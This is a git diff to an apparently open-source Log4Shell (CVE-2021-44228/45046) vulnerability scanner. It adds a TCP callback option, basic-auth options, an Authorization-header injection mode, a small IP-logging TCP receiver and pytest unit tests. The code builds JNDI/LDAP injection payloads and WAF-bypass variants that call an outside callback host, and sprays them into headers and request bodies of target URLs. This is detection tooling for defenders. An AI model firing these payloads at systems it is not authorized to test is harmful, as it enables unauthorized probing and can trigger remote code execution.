diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..c0d5faa --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.py text eol=lf \ No newline at end of file diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 0000000..e668ae4 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,11 @@ +name: Test +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: actions/setup-python@v2 + - run: pip install -r requirements.txt + - run: pip install -r tests/requirements.txt + - run: pytest \ No newline at end of file diff --git a/.gitignore b/.gitignore index 3d0dbe4..509e758 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,5 @@ -tests/ \ No newline at end of file +/.project +/.settings/ +/.pytest_cache/ +/.pydevproject +/**/__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index 93fd079..430c489 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,8 @@ - Fuzzing for HTTP POST Data parameters. - Fuzzing for JSON data parameters. - Supports DNS callback for vulnerability discovery and validation. +- Supports TCP callback for vulnerability discovery and validation on corporate network (requires [TCP receveir](./tcp-receiver)). +- Supports preemptive basic authentication or authorization header injection (basic type) - WAF Bypass payloads. --- @@ -38,8 +40,9 @@ $ python3 log4j-scan.py -h [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. -usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] - [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] +usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass] + [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] [--custom-tcp-callback-host CUSTOM_TCP_CALLBACK_HOST] + [--basic-auth-user USER] [--basic-auth-password PASSWORD] [--authorization-injection INJECTION_TYPE] [--disable-http-redirects] optional arguments: -h, --help show this help message and exit @@ -65,6 +68,14 @@ optional arguments: DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh]. --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST Custom DNS Callback Host. + --custom-tcp-callback-host CUSTOM_TCP_CALLBACK_HOST + Custom TCP Callback Host. + --basic-auth-user USER + Preemptive basic authentication user. + --basic-auth-password PASSWORD + Preemptive basic authentication password. + --authorization-injection INJECTION_TYPE + Authorization injection type: (basic) - [Default: none]. --disable-http-redirects Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems. ``` @@ -94,6 +105,16 @@ $ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass $ python3 log4j-scan.py -l urls.txt ``` +## Scan an URL using a custom TCP receiver + +In a corporate network, using external DNS could/should be forbidden, and install a dedicated corporate DNS for this scanner usage could be not trivial. + +A way could be to use a running simple **[TCP receiver](./tcp-receiver/)** which logs vulnerable IPs. + +```shell +$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --custom-tcp-callback-host 10.42.42.42:80 +``` + # Installation ``` @@ -112,6 +133,26 @@ sudo docker run -it --rm log4j-scan docker run -it --rm -v $PWD:/data log4j-scan -l /data/urls.txt ``` +# Unit tests execution + +[pytest](https://docs.pytest.org/en/latest/) framework is used: + +``` +virtualenv ~/tmp/venv-log4j-scan +source ~/tmp/venv-log4j-scan/bin/activate +pip install -r requirements.txt +pip install -r tests/requirements.txt + +# Execute all unit tests +pytest + +# Way to execute one unit test method +pytest -k "default" +pytest tests/test_log4j_scan.py::test_default +``` + +**NB**: Could only be executed on Linux, *termios* pip module can't be installed on Windows. + # About FullHunt FullHunt is the next-generation attack surface management platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more. diff --git a/log4j-scan.py b/log4j-scan.py index 120f07e..9755a02 100755 --- a/log4j-scan.py +++ b/log4j-scan.py @@ -23,7 +23,7 @@ from Crypto.PublicKey import RSA from Crypto.Hash import SHA256 from termcolor import cprint - +from requests.auth import HTTPBasicAuth # Disable SSL warnings try: @@ -32,16 +32,6 @@ except Exception: pass - -cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green") -cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow") -cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow") - -if len(sys.argv) <= 1: - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - default_headers = { 'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)', # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36', @@ -61,89 +51,105 @@ ] cve_2021_45046 = [ - "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995, + "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995, "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}", "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}" ] -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-p", "--proxy", - dest="proxy", - help="send requests through proxy", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("--request-type", - dest="request_type", - help="Request Type: (get, post) - [Default: get].", - default="get", - action='store') -parser.add_argument("--headers-file", - dest="headers_file", - help="Headers fuzzing list - [default: headers.txt].", - default="headers.txt", - action='store') -parser.add_argument("--run-all-tests", - dest="run_all_tests", - help="Run all available tests on each URL.", - action='store_true') -parser.add_argument("--exclude-user-agent-fuzzing", - dest="exclude_user_agent_fuzzing", - help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.", - action='store_true') -parser.add_argument("--wait-time", - dest="wait_time", - help="Wait time after all URLs are processed (in seconds) - [Default: 5].", - default=5, - type=int, - action='store') -parser.add_argument("--waf-bypass", - dest="waf_bypass_payloads", - help="Extend scans with WAF bypass payloads.", - action='store_true') -parser.add_argument("--test-CVE-2021-45046", - dest="cve_2021_45046", - help="Test using payloads for CVE-2021-45046 (detection payloads).", - action='store_true') -parser.add_argument("--dns-callback-provider", - dest="dns_callback_provider", - help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].", - default="interact.sh", - action='store') -parser.add_argument("--custom-dns-callback-host", - dest="custom_dns_callback_host", - help="Custom DNS Callback Host.", - action='store') -parser.add_argument("--disable-http-redirects", - dest="disable_redirects", - help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.", - action='store_true') - -args = parser.parse_args() - - -proxies = {} -if args.proxy: - proxies = {"http": args.proxy, "https": args.proxy} - -def get_fuzzing_headers(payload): +def parse_args(args_input): + parser = argparse.ArgumentParser() + parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') + parser.add_argument("-p", "--proxy", + dest="proxy", + help="send requests through proxy", + action='store') + parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') + parser.add_argument("--request-type", + dest="request_type", + help="Request Type: (get, post) - [Default: get].", + default="get", + action='store') + parser.add_argument("--headers-file", + dest="headers_file", + help="Headers fuzzing list - [default: headers.txt].", + default="headers.txt", + action='store') + parser.add_argument("--run-all-tests", + dest="run_all_tests", + help="Run all available tests on each URL.", + action='store_true') + parser.add_argument("--exclude-user-agent-fuzzing", + dest="exclude_user_agent_fuzzing", + help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.", + action='store_true') + parser.add_argument("--wait-time", + dest="wait_time", + help="Wait time after all URLs are processed (in seconds) - [Default: 5].", + default=5, + type=int, + action='store') + parser.add_argument("--waf-bypass", + dest="waf_bypass_payloads", + help="Extend scans with WAF bypass payloads.", + action='store_true') + parser.add_argument("--test-CVE-2021-45046", + dest="cve_2021_45046", + help="Test using payloads for CVE-2021-45046 (detection payloads).", + action='store_true') + parser.add_argument("--dns-callback-provider", + dest="dns_callback_provider", + help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].", + default="interact.sh", + action='store') + parser.add_argument("--custom-dns-callback-host", + dest="custom_dns_callback_host", + help="Custom DNS Callback Host.", + action='store') + parser.add_argument("--custom-tcp-callback-host", + dest="custom_tcp_callback_host", + help="Custom TCP Callback Host.", + action='store') + parser.add_argument("--basic-auth-user", + dest="basic_auth_user", + help="Preemptive basic authentication user.", + action='store') + parser.add_argument("--basic-auth-password", + dest="basic_auth_password", + help="Preemptive basic authentication password.", + action='store') + parser.add_argument("--authorization-injection", + dest="authorization_injection_type", + help="Authorization injection type: (basic) - [Default: none].", + default="none", + action='store') + parser.add_argument("--disable-http-redirects", + dest="disable_redirects", + help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.", + action='store_true') + + return parser.parse_args(args_input) + + +def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing, authorization_injection_type): fuzzing_headers = {} fuzzing_headers.update(default_headers) - with open(args.headers_file, "r") as f: + with open(headers_file, "r") as f: for i in f.readlines(): i = i.strip() if i == "" or i.startswith("#"): continue fuzzing_headers.update({i: payload}) - if args.exclude_user_agent_fuzzing: + if exclude_user_agent_fuzzing: fuzzing_headers["User-Agent"] = default_headers["User-Agent"] + if authorization_injection_type == 'basic': + fuzzing_headers["Authorization"] = 'Basic %s' % base64.b64encode((payload + ':fakepassword').encode('utf-8')).decode() fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' return fuzzing_headers @@ -164,6 +170,7 @@ def generate_waf_bypass_payloads(callback_host, random_string): payloads.append(new_payload) return payloads + def get_cve_2021_45046_payloads(callback_host, random_string): payloads = [] for i in cve_2021_45046: @@ -174,23 +181,26 @@ def get_cve_2021_45046_payloads(callback_host, random_string): class Dnslog(object): - def __init__(self): + + def __init__(self, proxies: {}): + self.proxies = proxies self.s = requests.session() req = self.s.get("http://www.dnslog.cn/getdomain.php", - proxies=proxies, + proxies=self.proxies, timeout=30) self.domain = req.text def pull_logs(self): req = self.s.get("http://www.dnslog.cn/getrecords.php", - proxies=proxies, + proxies=self.proxies, timeout=30) return req.json() class Interactsh: + # Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py - def __init__(self, token="", server=""): + def __init__(self, proxies: {}, token="", server=""): rsa = RSA.generate(2048) self.public_key = rsa.publickey().exportKey() self.private_key = rsa.exportKey() @@ -274,14 +284,17 @@ def parse_url(url): return({"scheme": scheme, "site": f"{scheme}://{urlparse.urlparse(url).netloc}", - "host": urlparse.urlparse(url).netloc.split(":")[0], + "host": urlparse.urlparse(url).netloc.split(":")[0], "file_path": file_path}) -def scan_url(url, callback_host): +def scan_url(url, callback_host, proxies, args): parsed_url = parse_url(url) random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7)) - payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string) + host_def = '%s.%s' % (parsed_url["host"], callback_host) + if args.custom_tcp_callback_host: + host_def = callback_host + payload = '${jndi:ldap://%s/%s}' % (host_def, random_string) payloads = [payload] if args.waf_bypass_payloads: payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)) @@ -289,14 +302,19 @@ def scan_url(url, callback_host): cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow") payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string) + auth = None + if args.basic_auth_user: + auth = HTTPBasicAuth(args.basic_auth_user, args.basic_auth_password) + for payload in payloads: cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan") if args.request_type.upper() == "GET" or args.run_all_tests: try: requests.request(url=url, method="GET", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), verify=False, timeout=timeout, allow_redirects=(not args.disable_redirects), @@ -309,8 +327,9 @@ def scan_url(url, callback_host): # Post body requests.request(url=url, method="POST", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), data=get_fuzzing_post_data(payload), verify=False, timeout=timeout, @@ -323,8 +342,9 @@ def scan_url(url, callback_host): # JSON body requests.request(url=url, method="POST", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), json=get_fuzzing_post_data(payload), verify=False, timeout=timeout, @@ -334,7 +354,18 @@ def scan_url(url, callback_host): cprint(f"EXCEPTION: {e}") -def main(): +def main(options): + + args = parse_args(options) + + if not args.url and not args.usedlist: + cprint("[•] Parameter '-u' or '-l' is required.", "red") + return + + proxies = {} + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + urls = [] if args.url: urls.append(args.url) @@ -346,29 +377,42 @@ def main(): continue urls.append(i) - dns_callback_host = "" - if args.custom_dns_callback_host: + if args.basic_auth_user: + cprint(f"[•] Using preemptive basic authentication with user [{args.basic_auth_user}].") + if not args.basic_auth_password: + raise ValueError("'--basic-auth-password' is mandatory when basic authentication user is defined.") + if args.authorization_injection_type != 'none': + raise ValueError("'--authorization-injection' is not compatible when basic authentication is defined.") + callback_host = "" + if args.custom_tcp_callback_host: + cprint(f"[•] Using custom TCP Callback host [{args.custom_tcp_callback_host}]. No verification will be done after sending fuzz requests.") + callback_host = args.custom_tcp_callback_host + elif args.custom_dns_callback_host: cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.") - dns_callback_host = args.custom_dns_callback_host + callback_host = args.custom_dns_callback_host else: cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).") if args.dns_callback_provider == "interact.sh": - dns_callback = Interactsh() + dns_callback = Interactsh(proxies=proxies) elif args.dns_callback_provider == "dnslog.cn": - dns_callback = Dnslog() + dns_callback = Dnslog(proxies=proxies) else: raise ValueError("Invalid DNS Callback provider") - dns_callback_host = dns_callback.domain + callback_host = dns_callback.domain cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta") for url in urls: cprint(f"[•] URL: {url}", "magenta") - scan_url(url, dns_callback_host) + scan_url(url, callback_host, proxies, args) if args.custom_dns_callback_host: cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan") return + if args.custom_tcp_callback_host: + cprint("[•] Payloads sent to all URLs. Custom TCP Callback host is provided, please check TCP receiver logs to verify the existence of the vulnerability. Exiting.", "cyan") + return + cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan") cprint("[•] Waiting...", "cyan") time.sleep(int(args.wait_time)) @@ -383,7 +427,16 @@ def main(): if __name__ == "__main__": try: - main() + + cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green") + cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow") + cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow") + + if len(sys.argv) <= 1: + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + main(sys.argv[1:]) except KeyboardInterrupt: print("\nKeyboardInterrupt Detected.") print("Exiting...") diff --git a/tcp-receiver/README.md b/tcp-receiver/README.md new file mode 100644 index 0000000..e3805a5 --- /dev/null +++ b/tcp-receiver/README.md @@ -0,0 +1,11 @@ +# Simple Python TCP receiver + +Simple TCP receiver, which logs and writes in `output.txt` file any IP trying to connect on it (port 80, most common). + +It is for `--custom-tcp-callback-host` option usage of *log4j-scan*. + +Usage: + +```shell +nohup python3 log4ShellReceiver.py 2>&1 & +``` diff --git a/tcp-receiver/log4ShellReceiver.py b/tcp-receiver/log4ShellReceiver.py new file mode 100644 index 0000000..a7ea7f8 --- /dev/null +++ b/tcp-receiver/log4ShellReceiver.py @@ -0,0 +1,34 @@ +import socket +import sys + +# Create a socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Ensure that you can restart your server quickly when it terminates +sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + +# Set the client socket's TCP "well-known port" number +well_known_port = 80 +sock.bind(('', well_known_port)) + +# Set the number of clients waiting for connection that can be queued +print("Listening on " + str(well_known_port)) +sock.listen(20) + +# loop waiting for connections (terminate with Ctrl-C) +try: + while 1: + # accept + newSocket, address = sock.accept() + newSocket.setblocking(0) + sys.stdout.write("Connected from %s:%d..." % address) + + # log the IP address + with open("output.txt", "a") as outfile: + outfile.write("%s\n" % address[0]) + + # close the connection quickly + newSocket.close() + print("disconnected") +finally: + sock.close() diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tests/requirements.txt b/tests/requirements.txt new file mode 100644 index 0000000..08539a9 --- /dev/null +++ b/tests/requirements.txt @@ -0,0 +1,4 @@ +pytest +pytest-mock +pytest-cov +requests-mock \ No newline at end of file diff --git a/tests/test_log4j_scan.py b/tests/test_log4j_scan.py new file mode 100644 index 0000000..ff2bee6 --- /dev/null +++ b/tests/test_log4j_scan.py @@ -0,0 +1,98 @@ +import re +import base64 +import pytest +import requests_mock +import importlib +log4j_scan = importlib.import_module("log4j-scan", package='..') + +LOCALHOST = 'https://localhost/' +DNS_CUSTOM = 'custom.dns.callback' + + +def test_args_required(capsys): + log4j_scan.main([]) + captured = capsys.readouterr() + assert 'Parameter \'-u\' or \'-l\' is required' in captured.out + + +def test_default(requests_mock, capsys): + adapter_dns_register = requests_mock.post('https://interact.sh/register', text='success') + adapter_dns_save = requests_mock.get('https://interact.sh/poll', json={'data': [], 'extra': None, 'aes_key': 'FAKE'}) + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST]) + + captured = capsys.readouterr() + + assert adapter_dns_register.call_count == 1 + assert adapter_endpoint.call_count == 1 + assert adapter_dns_save.call_count == 1 + assert '.interact.sh/' in captured.out + assert 'Targets does not seem to be vulnerable' in captured.out + assert 'jndi' in adapter_endpoint.last_request.url + assert re.match(r'\${jndi:ldap://localhost\..*.interact\.sh/.*}', adapter_endpoint.last_request.headers['User-Agent']) + assert 'Authorization' not in adapter_endpoint.last_request.headers + + +def test_custom_dns_callback_host(requests_mock, capsys): + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM ]) + + assert adapter_endpoint.call_count == 1 + assert re.match(r'\${jndi:ldap://localhost\.custom.dns.callback/.*}', adapter_endpoint.last_request.headers['User-Agent']) + + captured = capsys.readouterr() + assert 'Using custom DNS Callback host [custom.dns.callback]' in captured.out + assert 'Custom DNS Callback host is provided' in captured.out + + +def test_custom_tcp_callback_host(requests_mock, capsys): + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-tcp-callback-host', '10.42.42.42:80']) + + assert adapter_endpoint.call_count == 1 + assert re.match(r'\${jndi:ldap://10.42.42.42:80/.*}', adapter_endpoint.last_request.headers['User-Agent']) + + captured = capsys.readouterr() + assert 'Using custom TCP Callback host [10.42.42.42:80]' in captured.out + assert 'Custom TCP Callback host is provided' in captured.out + + +def test_authentication_basic_no_password(): + with pytest.raises(Exception) as ex: + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo' ]) + assert "'--basic-auth-password' is mandatory when basic authentication user is defined." == str(ex.value) + + +def test_authentication_basic(requests_mock): + adapter_endpoint_get = requests_mock.get(LOCALHOST) + adapter_endpoint_post = requests_mock.post(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo', '--basic-auth-password', 'bar', '--run-all-tests']) + + assert adapter_endpoint_get.call_count == 1 + assert adapter_endpoint_post.call_count == 2 + + _basic_auth_encoded = 'Basic Zm9vOmJhcg==' + assert _basic_auth_encoded == adapter_endpoint_get.last_request.headers['Authorization'] + assert _basic_auth_encoded == adapter_endpoint_post.request_history[0].headers['Authorization'] + assert _basic_auth_encoded == adapter_endpoint_post.request_history[1].headers['Authorization'] + + +def test_authentication_injection_basic_with_user(): + with pytest.raises(Exception) as ex: + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic', '--basic-auth-user', 'foo', '--basic-auth-password', 'bar' ]) + assert "'--authorization-injection' is not compatible when basic authentication is defined." == str(ex.value) + + +def test_authentication_injection_basic(requests_mock): + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic']) + + assert adapter_endpoint.call_count == 1 + _basic_auth = 'Basic %s' % base64.b64encode((adapter_endpoint.last_request.headers['User-Agent'] + ':fakepassword').encode('utf-8')).decode() + assert _basic_auth == adapter_endpoint.last_request.headers['Authorization'] +